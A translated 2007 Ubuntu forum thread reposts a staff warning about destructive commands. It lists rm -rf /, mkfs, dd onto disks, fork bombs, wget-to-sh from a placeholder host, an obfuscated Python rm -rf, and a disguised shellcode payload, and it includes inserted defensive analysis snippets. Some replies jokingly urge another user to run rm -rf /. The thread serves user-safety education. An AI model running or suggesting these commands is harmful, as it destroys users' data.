Please do not run commands like the following -- dangerous Ubuntu commands


#1

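Post by karron » 2007-11-28 20:51

Recently the official Ubuntu forums issued an official announcement listing the dangerous commands below, warning users not to run them, and stating that accounts which casually post these commands will be banned outright.

To repeat: please do not run the commands below or anything like them. These commands will seriously affect your computer.

Please do not use pretexts such as "teaching ordinary users a lesson to raise their security awareness" as an excuse for ill-intentioned behaviour!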

http://ubuntuforums.org/announcement.php?a=54

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
The commands below delete all files, delete the current directory, and delete the files in the current directory.

Code:

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
The commands below destroy the entire filesystem and rebuild the partition.

Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Oftentimes this will clobber the filesystem and cause total loss of data:
The commands below wipe the entire hard disk.

Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiosity provokes)
The commands below start a huge number of processes, leaving the system unresponsive so that only a hard reboot is possible, which may damage data.

Code:

:(){:|:&};:

In Perl

Code:

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory.

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source.

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.
Do not run shell scripts provided by people you do not trust; they may contain dangerous commands and scripts. Do not casually extract archives that others give you; they may look small, yet fill the entire hard disk once extracted.

Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Do not compile and run unknown code that others give you.

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:

Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.
Last edited by karron on 2007-12-14 16:25, edited 2 times in total.
My blog, about technology, software, linux, vim <---- all blogs have been "harmonized" (censored).
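The tarbomb and decompression-bomb advice in the announcement quoted above amounts to checking an archive before unpacking it. This added example (not part of the original post or announcement) lists a tar archive's entries with Python's `tarfile` and reports paths that would land outside a fresh directory, links, device nodes, and declared sizes over a limit; the limits, function names and the in-memory sample archive are constructed for illustration.

```python
import io
import tarfile
from pathlib import PurePosixPath

MAX_MEMBERS = 10_000        # assumed limit on entry count, tune per use
MAX_TOTAL_BYTES = 1 << 30   # assumed limit on declared unpacked size (1 GiB)


def audit_tar(fileobj, max_members=MAX_MEMBERS, max_bytes=MAX_TOTAL_BYTES):
    """Read headers only and return a list of findings (empty list = nothing flagged)."""
    findings, count, total = [], 0, 0
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar:
            count += 1
            total += m.size
            path = PurePosixPath(m.name)
            if path.is_absolute() or ".." in path.parts:
                findings.append(f"escapes target dir: {m.name}")
            if m.issym() or m.islnk():
                findings.append(f"link: {m.name} -> {m.linkname}")
            if m.isdev():
                findings.append(f"device node: {m.name}")
            if count > max_members or total > max_bytes:
                findings.append(f"too large: {count} entries, {total} bytes declared")
                break  # stop reading; do not walk a million headers
    return findings


def build_sample():
    """Constructed sample: one ordinary file plus three entries that should be flagged."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in ("notes/readme.txt", "../.bashrc", "/etc/cron.d/job"):
            data = b"sample\n"
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo("notes/latest")
        link.type, link.linkname = tarfile.SYMTYPE, "/etc/passwd"
        tar.addfile(link)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for finding in audit_tar(build_sample()):
        print(finding)
```

An archive that passes this check should still be unpacked into a newly created, empty directory, as the announcement advises.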
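The hex payload quoted in the announcement above can be read without running it. This added example (not part of the original post or announcement) compares what a `strings`-style scan shows with what appears once the operands of the `push imm32` instructions are bit-inverted, which is what the `f7 16` / `f7 56 xx` (`not`) instructions in the payload do at run time; the function names are hypothetical.

```python
import re

# Byte string copied from the post above; it is only parsed here, never executed.
PAYLOAD = (
    b"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    b"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    b"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    b"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    b"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    b"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    b"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
)

PUSH_IMM32 = 0x68  # x86 opcode: push a 4-byte immediate


def visible_strings(code, min_len=4):
    """What a `strings`-style scan reports: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode() for m in re.finditer(pattern, code)]


def inverted_pushes(code):
    """Recover text stored as bit-inverted `push imm32` operands.

    Heuristic, not a disassembler: every 0x68 byte is treated as a possible
    push, and its operand is kept only if the bitwise NOT of all four bytes
    is printable ASCII or NUL padding.
    """
    chunks = []
    for i, byte in enumerate(code[:-4]):
        if byte != PUSH_IMM32:
            continue
        plain = bytes(b ^ 0xFF for b in code[i + 1:i + 5])
        if all(b == 0 or 0x20 <= b <= 0x7E for b in plain):
            chunks.append(plain)
    # The stack grows downward, so the last push is the start of the string.
    return b"".join(reversed(chunks)).rstrip(b"\0").decode()


if __name__ == "__main__":
    print("strings sees:", visible_strings(PAYLOAD))
    print("hidden text :", inverted_pushes(PAYLOAD))
```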

#2

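Post by yiding_he » 2007-11-28 20:52

Hey, those explanatory texts still need to be translated.

The experts over at cnbeta found it right away: "Running rm -rf / on Linux"
http://www.youtube.com/watch?v=D4fzInlyYQo

If you do not know what happens when you run rm -rf /, take a look here.
You are free. So is everyone else.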

#3

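Post by stlxv » 2007-11-29 0:31

Please, could you not translate only the part about the harm (and a translation that quotes out of context at that)?

A lot of valuable content from the original has been lost, and you have changed much of the original's content!
PHP is the best language! Come and fight me if you disagree!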

#4

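Post by carbont » 2007-11-29 3:09

> yiding_he wrote:
> Hey, those explanatory texts still need to be translated.
>
> The experts over at cnbeta found it right away: "Running rm -rf / on Linux"
> http://www.youtube.com/watch?v=D4fzInlyYQo
>
> If you do not know what happens when you run rm -rf /, take a look here.

This one is pretty cool...
Maybe I'll do it once myself some time -- when this computer goes to someone else and they want XP!
Heh heh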

#5

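Post by karron » 2007-11-29 9:22

> stlxv wrote:
> Please, could you not translate only the part about the harm (and a translation that quotes out of context at that)?
>
> A lot of valuable content from the original has been lost, and you have changed much of the original's content!

The original is posted right here; what did I lose? I posted the original here untouched, except that I did not post some of the forum-rule warnings at the beginning. With an article this long, I do not have the energy to translate it completely; I just wrote out the harm so everyone can take a look. If you want to understand the principles further, the original is here too; just read the English yourself.

If anyone is willing to translate the whole thing, they can reply directly or edit the original post.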

#6

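Post by yiding_he » 2007-11-29 9:27

> karron wrote:
>> stlxv wrote:
>> Please, could you not translate only the part about the harm (and a translation that quotes out of context at that)?
>>
>> A lot of valuable content from the original has been lost, and you have changed much of the original's content!
>
> The original is posted right here; what did I lose? I posted the original here untouched, except that I did not post some of the forum-rule warnings at the beginning. With an article this long, I do not have the energy to translate it completely; I just wrote out the harm so everyone can take a look. If you want to understand the principles further, the original is here too; just read the English yourself.
>
> If anyone is willing to translate the whole thing, they can reply directly or edit the original post.

Below is my translation of the opening part of the original post: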


ATTENTION ALL USERS: Malicious Commands
Attention all users: dangerous commands

I'd like to take a moment of your time to discuss a recent disturbing trend the staff has been noticing on the forums, and also take this as an opportunity to raise awareness of this situation through education.
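I would like to take some time to discuss some of the disorder we have recently noticed on the forum, and I hope that, through the relevant guidance, this situation will get everyone's attention.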

We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.
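We have recently found some dangerous commands appearing in forum posts, and their number is on the rise. Don't play dumb, I know you understand what I mean -- these commands can cause large-scale damage and even crash the computer.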

I'd just like to caution those thinking of doing this that UbuntuForums has a strict zero-tolerance policy when it comes to posting dangerous commands. If you post one of them, particularly in a support thread disguised as advice, expect to be instantly and permanently BANNED, at the account, e-mail, IP, or ISP level. I do not care about intent -- if you mean it as a joke, it is not funny. If you mean it as a lesson, go teach it somewhere else. This behavior is absolutely against the Forum Guidelines and Ubuntu Code of Conduct.
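I hereby warn those who do this: the Ubuntu forums absolutely do not tolerate the posting of dangerous commands. If you post a dangerous command, especially offering it as advice in a help thread, you will be banned immediately and permanently, including your account, e-mail, IP address, or even ISP. I do not care what your intent is -- if you are joking, this is not the place for your jokes; if you want to teach others this command, then please go and teach it somewhere else. This behaviour completely violates our forum guidelines and the Ubuntu Code of Conduct.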

I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). No matter how hard we try to stay on top of all posts in realtime, we are not perfect.
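I also remind users: if someone tells you that solving some problem requires running some command or downloading and running some script, please be on your guard. If you have doubts about it, please wait a little and see what others say, or ask them for a reasonable explanation, or consult the relevant documentation (such as the man pages). Although we strive to answer everyone's questions as quickly as possible, we cannot necessarily manage it every time.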


Regards,

The UbuntuForums Staff.



As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.
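At the request of some forum users, and also as a reminder to everyone, we list some examples of dangerous commands. These examples are extremely dangerous; if your machine holds important data, please do not run them -- these commands can damage the computer even in a LiveCD environment.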

Again, DANGEROUS COMMANDS -- look but DO NOT RUN.
Once again, a reminder to everyone: these are all dangerous commands -- looking is fine, but do not try them.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".
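Of course, this list is actually very incomplete, but after looking at these you will have a rough idea of the commands that are meant to trick you. Be aware that these commands may well be hidden in a large chunk of script, so when something about them feels wrong, you should be on your guard.
Last edited by yiding_he on 2007-11-29 9:33, edited 1 time in total.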

#7

Post by bones7456 » 2007-11-29 9:30

Actually, as long as you don't use sudo, everything is negotiable....
Follow my blog: ε==3

#8

Post by yiding_he » 2007-11-29 9:34

> bones7456 wrote: Actually, as long as you don't use sudo, everything is negotiable....

Without sudo? That one is not so negotiable.

#9

Post by yysq009 » 2007-11-29 9:57

Generally speaking, people are curious by nature. Tell them they can't, and they will insist on trying it....

Do as you would be done by!

#10

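Post by me » 2007-11-29 10:17

Code:

rm -rf /

Never run the code above unless you know what you are doing

Does the code above only delete files on the root partition?
Will files in mounted partitions such as /media/sda1 be deleted as well?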

#11

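Post by xiehuoli » 2007-11-29 10:19

The poster above can go and try it
Heh heh
Even the root partition gets deleted for you; think about what would happen
Youth has no failure! ! ! ! ! !
Oh! There's a monster, there's a monster!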

#12

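Post by stlxv » 2007-11-29 10:23

> xiehuoli wrote: The poster above can go and try it
> Heh heh
> Even the root partition gets deleted for you; think about what would happen

:lol: Go ahead and run it, don't worry

The result cannot be that all files get deleted by you; try it if you don't believe me :wink: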

#13

Post by windwiny » 2007-11-29 10:41

....The poster above, don't play with fire; it would not be good if one of the few Ubuntu girls got banned

#14

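Post by stlxv » 2007-11-29 10:55

> windwiny wrote: ....The poster above, don't play with fire; it would not be good if one of the few Ubuntu girls got banned

:roll: I didn't tell her to do it. Besides, if he does it, what has that got to do with me.

Anyway, I have done it myself.

:roll: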

#15

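Post by xiehuoli » 2007-11-29 10:59

> stlxv wrote:
>> windwiny wrote: ....The poster above, don't play with fire; it would not be good if one of the few Ubuntu girls got banned
>
> :roll: I didn't tell her to do it. Besides, if he does it, what has that got to do with me.
>
> Anyway, I have done it myself.
>
> :roll:

Back in the day I ran chmod -R 777 /etc on my own /etc
What a thrill; the more you use it, the more problems you discover. Now that is the most awesome one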